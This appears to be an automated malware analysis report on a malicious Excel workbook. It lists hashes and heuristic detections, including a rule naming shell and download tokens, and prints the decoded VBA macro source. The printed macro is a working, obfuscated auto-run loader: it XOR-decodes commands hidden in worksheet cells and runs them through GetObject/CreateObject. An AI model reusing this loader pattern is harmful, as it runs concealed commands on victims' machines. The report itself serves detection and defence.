Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 11a91fa719687fcb…

MALICIOUS

Office (OLE) / .XLS

Size: 67.0 KB
Created: 2023-09-10 08:03:05
Authoring application: Microsoft Excel
First seen: 2023-09-13
MD5: c9746528d65dfe72dee3426f31067f44
SHA-1: 57787d9538ece2fcf5d3edf5a60cf71b8a9e4cf8
SHA-256: 11a91fa719687fcb9d78b114a13fc5013af823a82a7f4c362a52042b41e0f24f
Risk Score: 148

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample is an Excel workbook containing VBA macros, including a Workbook_Open auto-execution macro. High-severity heuristics flag calls to CreateObject and GetObject, which are commonly used to execute malicious code. The macro code, although partially obfuscated, appears designed to download and execute a second-stage payload, most likely through those CreateObject and GetObject calls.

Heuristics (5)

  • VBA macros detected [medium] OLE_VBA_MACROS (4 related findings)
    Document contains VBA macro code
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched line in script:
    GetObject(Ottawa).CreateObject(Chapters).Run Fisting & " " & Noticed & AnimAted, 0
  • GetObject call [high] OLE_VBA_GETOBJ
    Matched line in script:
    GetObject(Ottawa).CreateObject(Chapters).Run Fisting & " " & Noticed & AnimAted, 0
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Matched line in script:
    Sub Workbook_Open()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4310 bytes
SHA-256: 7e5d52c65e1dce05cb378373130ac36532e010133055b847aecc0c8f81e5bdfd
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

' String decoder: hex-decodes the input via Equation, then XORs each byte with the
' repeating 10-byte key "gc4263a9ce". Control flow is flattened with GoTo labels.
Private Function Mills(ByVal TorTure As String) As Variant
Dim Displaying As Long: Displaying = 0: Dim Genes() As Byte
Dim ExaminEd() As Byte, ExpEnditurE As String, Personalized As Integer, GanGbanG As Integer, Destruction As Integer
' Assigning a String to a Byte array stores its UTF-16LE bytes, so ExaminEd(n * 2) is the n-th key character
ExaminEd = "gc4263a9ce"
GoTo RemaRks
ExtEnsions:
' Loop over all bytes except the trailing spare element allocated by Equation
If Displaying < UBound(Genes) Then
    Personalized = Displaying Mod (10)
    Destruction = ExaminEd(Personalized * 2)
    GanGbanG = Genes(Displaying)
    GoTo Mistake
Overnight:
    ExpEnditurE = ExpEnditurE & Chr(Genes(Displaying))
    Displaying = Displaying + 1
    GoTo ExtEnsions
Else
    GoTo DiviDeD
End If
DiviDeD:
Mills = ExpEnditurE
Exit Function
RemaRks:
Genes = Equation(TorTure)
GoTo ExtEnsions
Mistake:
Genes(Displaying) = Abs(GanGbanG Xor Destruction)
GoTo Overnight
End Function

' Executor: resolves an object from the moniker string Ottawa, creates a child object
' by ProgID (Chapters) and calls its Run method with the assembled command line;
' the trailing 0 is passed as the window-style argument.
Private Sub Florence(ByVal Ottawa As String, ByVal AnimAted As String, ByVal Fisting As String, ByVal Chapters As String, ByVal Noticed As String)
GetObject(Ottawa).CreateObject(Chapters).Run Fisting & " " & Noticed & AnimAted, 0
End Sub

' Auto-execution entry point: every argument is decoded at run time from cells of
' worksheet "l747f", so no plaintext command strings appear in the macro source.
Sub Workbook_Open()
Florence Mills(Sheets("l747f").Range("E150").Value), Mills(Sheets("l747f").Range("F186").Value), Mills(Sheets("l747f").Range("F124").Value), Mills(Sheets("l747f").Range("H114").Value), Mills(Sheets("l747f").Range("H162").Value)
End Sub

' Hex decoder: each pair of hex characters becomes one byte by building the literal
' "&Hxx" (Chr(38) = "&", Chr(72) = "H") and letting VBA coerce it to Byte on
' assignment. The array is one element longer than needed, leaving a trailing 0.
Private Function Equation(ByVal Introduce As String) As Variant
Dim ExpEnditurE() As Byte, i As Long, Personalized As Integer, Lycos As Integer
Lycos = Len(Introduce) / 2: i = 0: ReDim ExpEnditurE(0 To Lycos) As Byte
Destruction:
If i < Len(Introduce) Then
    Personalized = Personalized + 1
    ExpEnditurE(Personalized - 1) = Chr((7 * 2) + (((10 - 4) * 2) * 2)) & Chr((((16 / 2) * 2) + (4 * 5)) * 2) & Mid(Introduce, i + 1, 2)
    i = i + 2
    GoTo Destruction
Else
    GoTo Victim
    ' Dead code: never reached because of the unconditional GoTo above
    Dim Mistake As String
    Mistake = InputBox("celp lape")
End If
Victim:
Equation = ExpEnditurE
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True